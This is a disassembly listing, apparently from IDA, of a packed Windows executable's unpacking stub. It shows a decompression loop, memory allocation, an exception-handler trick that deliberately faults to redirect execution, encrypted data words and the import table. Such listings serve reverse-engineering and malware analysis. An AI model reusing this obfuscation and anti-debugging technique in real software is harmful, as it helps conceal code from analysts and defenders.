loc_4190D5: ; CODE XREF: sub_419062+6B�j
inc ecx
loc_4190D6: ; CODE XREF: sub_419062+70�j
xchg eax, ebp
loc_4190D7: ; CODE XREF: sub_419062+4B�j
mov eax, ebp
mov bl, 1
loc_4190DB: ; CODE XREF: sub_419062+38�j
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short loc_419073
sub_419062 endp
; =============== S U B R O U T I N E =======================================
sub_4190E5 proc near ; CODE XREF: sub_419062:loc_419073�p
; sub_419062+1A�p ...
add dl, dl
jnz short locret_4190EE
mov dl, [esi]
inc esi
adc dl, dl
locret_4190EE: ; CODE XREF: sub_4190E5+2�j
retn
sub_4190E5 endp
; =============== S U B R O U T I N E =======================================
sub_4190EF proc near ; CODE XREF: sub_419062+46�p
; sub_419062+5C�p
xor ecx, ecx
sub_4190EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4190F1 proc near ; CODE XREF: sub_419062:loc_41909F�p
inc ecx
loc_4190F2: ; CODE XREF: sub_4190F1+D�j
call sub_4190E5
adc ecx, ecx
call sub_4190E5
jb short loc_4190F2
retn
sub_4190F1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_419062
loc_419101: ; CODE XREF: sub_419062+50�j
sub edi, [esp+20h+arg_4]
mov [esp+20h+var_4], edi
popa
retn
; END OF FUNCTION CHUNK FOR sub_419062
; =============== S U B R O U T I N E =======================================
sub_41910B proc near ; CODE XREF: start+16E�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
pusha
push 40h
push 1000h
push [esp+28h+arg_0]
push 0
call dword ptr ss:word_4138EA[ebp]
mov [esp+20h+var_4], eax
popa
retn 4
sub_41910B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_419127: ; CODE XREF: start+1�j
call $+5
sub [esp+24h+var_24], 413A12h
pop ebp
cmp byte ptr ss:dword_413AFC[ebp], 0
jz short loc_419146
add esp, 0FFFFFFECh
jmp dword ptr [ebp+413AFDh]
; ---------------------------------------------------------------------------
loc_419146: ; CODE XREF: start+DF�j
inc ss:dword_413AFC[ebp]
call $+5
sub [esp+24h+var_24], 151h
mov eax, ss:dword_4138FA[ebp]
sub [esp+24h+var_24], eax
mov eax, [esp+24h+var_24]
mov ss:dword_4138FA[ebp], eax
pop eax
mov eax, ss:dword_4138FA[ebp]
mov edx, [eax+3Ch]
add edx, eax
mov edx, [edx+80h]
add edx, eax
mov ecx, [edx+60h]
mov dword ptr ss:word_4138E6[ebp], ecx
mov ecx, [edx+68h]
mov dword ptr ss:word_4138EA[ebp], ecx
mov ecx, [edx+6Ch]
mov dword ptr ss:word_4138F2[ebp], ecx
mov ecx, [edx+64h]
mov dword ptr ss:word_4138EE[ebp], ecx
mov ecx, [edx+7Ch]
mov ss:dword_4138F6[ebp], ecx
cmp dword ptr ss:word_413916[ebp], 41534C54h
jz short loc_4191C5
mov ebx, dword ptr ss:word_413916[ebp]
mov edx, dword ptr ss:word_413906[ebp]
mov [edx], ebx ; CODE XREF: start+1E0�j
loc_4191C5: ; CODE XREF: start+159�j
push 2000h
call sub_41910B
push eax
lea ecx, dword_413B02[ebp]
push eax
push ecx
call sub_419062
add esp, 8
pop eax
lea edi, [eax+74h]
lea esi, word_4138E6[ebp]
mov ecx, 18h
rep movsb
add eax, 0A4h
mov [ebp+413AFDh], eax
push eax
push large dword ptr fs:0
mov large fs:0, esp
jmp short loc_419210
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
prefetchnta byte ptr [eax]
; START OF FUNCTION CHUNK FOR start
loc_419210: ; CODE XREF: start+1AF�j
xor eax, eax
mov eax, [eax]
jmp short loc_41921B
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
dw 0A401h
db 0, 84h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_41921B: ; CODE XREF: start+1B8�j
nop
add [eax], bh
adc [eax+70h], al
insb
inc byte ptr [esi]
adc [ecx-27h], al
or [ecx], edx
and [edx], dl
pop esp
sub [ecx], al
cmc
popa
fcom dword ptr [ebx]
add [esp+ecx+arg_4B], ebx
inc eax
add eax, 65731056h
jb short near ptr loc_4191C3+1
jmp near ptr 604F9DECh
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
db 8Bh
dd 1D3D2474h, 0FC28007Ch, 0DB3380B2h, 2B3A406h, 3E2D6DE8h
dd 0C93CF673h, 790964A8h, 42C0791Ch, 3623305Bh, 0F810B041h
dd 1219C74Fh, 75F7E0C0h, 0EB3FAA3Fh, 1D4D31D4h, 22F3CB2Bh
dd 0EB0F422Eh, 21D1AC28h, 0C9134D74h, 0F911CE4h, 8E0C148h
dd 2D2C59DFh, 837DC13Dh, 0FC800A7Dh, 8306A805h, 777F37F8h
dd 8B95108Ch, 13AB3C5h, 2BF78056h, 5EA4F3F0h, 28E00EBh
dd 8A0575D2h, 12774616h, 41EAC360h, 0DBFFEEE8h, 0E7BB8602h
dd 0F2720F05h, 9A4C2BC3h, 7A1C0889h, 0B3E85261h, 0ED815D02h
dd 4A403C71h, 233BBD80h, 2A0F4043h, 76DA7485h, 640DA0FEh
dd 3E20A0A1h, 2820798Bh, 1F0A058Fh, 604C483h, 323BA285h
dd 3C1E50ECh, 92CDD003h, 11812980h, 8D89584Ah, 3E8246CDh
dd 0DC9BD30h, 31874FFh, 9D8D406Ah, 16324211h, 11250E53h
dd 952A8D6Ah, 8B006F9Eh, 61BD8D51h, 359131Ah, 77FFE8F9h
dd 23E8041Bh, 0BA4831D7h, 4A038925h, 0FF50011Ah, 0FEB9E837h
dd 14DEAB46h, 17D88B08h, 44FC0A7h, 81A0E983h, 1484BAB5h
dd 0E856503Fh, 81FFE815h, 0C1835900h, 0DBC8D08h, 703B1A22h
dd 9D75053Fh, 40C5858Ah, 74C08486h, 636E805h, 536E3E02h
dd 8518B28Dh, 3530DA6h, 5655C11Eh, 8957C080h, 3B102444h
dd 7D63840Fh, 0F6F8308Bh, 70EC0775h, 740E8FFFh, 0C40A77Ch
dd 30E1CA0h, 504CCEF1h, 11B3D9AAh, 0D08B0596h, 0D20EFA83h
dd 624CED49h, 79F506EDh, 0C4E92D6h, 48748A8Eh, 808EEB3Ah
dd 0FF2507E2h, 1EB87A5h, 520243C0h, 6C22CB50h, 835A028Eh
dd 78904C6h, 0C7DA2C93h, 5E06B486h, 80F1CF8h, 34EBCE75h
dd 0F5368E14h, 0C0830F81h, 0C4891414h, 98917785h, 0EF464EEBh
dd 76BD43BCh, 890DB260h, 783243Ch, 0FF61FCECh, 60DC7264h
dd 32685141h, 0F18941F1h, 224C222Ch, 0C175D492h, 1904C213h
dd 1940346Ch, 9A950411h, 83039B2h, 836918Dh, 4924BD9Fh
dd 8442D53Eh, 8DEC90BEh, 1A5EA2B6h, 0AAB28582h, 81B5DE22h
dd 0AE85C706h, 0F010014h, 660C4EB7h, 0E140374h, 40C173E3h
dd 17A8BDA0h, 0BFA22A75h, 7F49E32Eh, 0C1036987h, 9154EB02h
dd 4D200E0Eh, 81460A44h, 43F1218h, 51384410h, 44681C1h
dd 85032D51h, 53F75A43h, 0A05241Ch, 44FFF08Bh, 819DEB65h
dd 4DB52B71h, 0E07B1787h, 13EB0448h, 0DC595E30h, 2890E208h
dd 30228DFFh, 0EB1E1778h, 8A1260EFh, 0C644C19Dh, 8F813049h
dd 0B85FBE2h, 9DAEB61h, 0A098288Fh, 1B9AD484h, 0DB0CE824h
dd 15CAE98Ch, 0EC8B0355h, 57565351h, 0C10C4DB0h, 0A802E924h
dd 33087500h, 4CD3ADD2h, 0E20396C8h, 0FC5589F9h, 599845FBh
dd 5B095E5Fh, 8960C3C9h, 1C89897Bh, 4894AB7Dh, 8348666Ah
dd 0BCE8FC0Ah, 405A9CAEh, 1D948B5Bh, 38C03FA7h, 1675C23Bh
dd 494E9959h, 0C369580Eh, 6E7F7387h, 80C57505h, 0F7958D2Bh
dd 0BC5241CCh, 32FF3964h, 43228981h, 0E8C046DEh, 60027803h
dd 0F0112C2Fh, 7451E56Ah, 0FC468B99h, 0EE92CCDh, 55538118h
dd 0C7526958h, 6EA754B3h, 0A0FE0115h, 39726157h, 6717696Eh
dd 0D264421h, 306A0541h, 400853D1h, 6208410Fh, 8B601F7Ch
dd 24C2E7ECh, 0D02B0043h, 0C2F47374h, 0C12CDBECh, 0B50452E8h
dd 915D4328h, 3E831CA2h, 0E90B7412h, 846A34Eh, 0B68F9FD1h
dd 48156711h, 7663E7Bh, 0CEBC11Eh, 7401FB91h, 50020B9Dh
dd 0C033D16h, 2F2AEB20h, 0FFE31481h, 1F79850Fh, 0D41F0401h
dd 14B20F1Bh, 0B02D0C04h, 0E202881Dh, 0A0EB26BAh, 6BE90925h
dd 641CB921h, 8D0B2C6Eh, 23C203FFh, 811935Ch, 252406F5h
dd 410EDF04h, 696C2070h, 0E8746163h, 206E076Fh, 1F73656Dh
dd 3BC674Eh, 53544D47h, 0B8017F85h, 6AB40h, 26Ch dup(0)
SoftComp ends
; Section 5. (virtual address 0001A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0001A000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_idata segment para public 'CODE' use32
assume cs:_idata
;org 41A000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 1A03Ch, 2 dup(0)
dd 1A084h, 1A058h, 1A074h, 2 dup(0)
dd 1A0F4h, 1A07Ch, 5 dup(0)
dd 1A092h, 1A0A0h, 1A0B4h, 1A0C6h, 1A0D6h, 1A0E6h, 0
dd 77E75CB5h, 77E79F93h, 77E7A5FDh, 77E805D8h, 77E7980Ah
dd 77E79E34h, 0
dd 1A100h, 0
dd 77D6ADD7h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 0
aExitprocess db 'ExitProcess',0
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aVirtualalloc db 'VirtualAlloc',0
align 4
aVirtualfree db 'VirtualFree',0
aUser32_dll_0 db 'USER32.DLL',0
align 10h
dd 654D0000h, 67617373h, 786F4265h, 41h, 3BCh dup(0)
_idata ends
; Section 6. (virtual address 0001B000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 41B000h
align 2000h
_idata2 ends
end start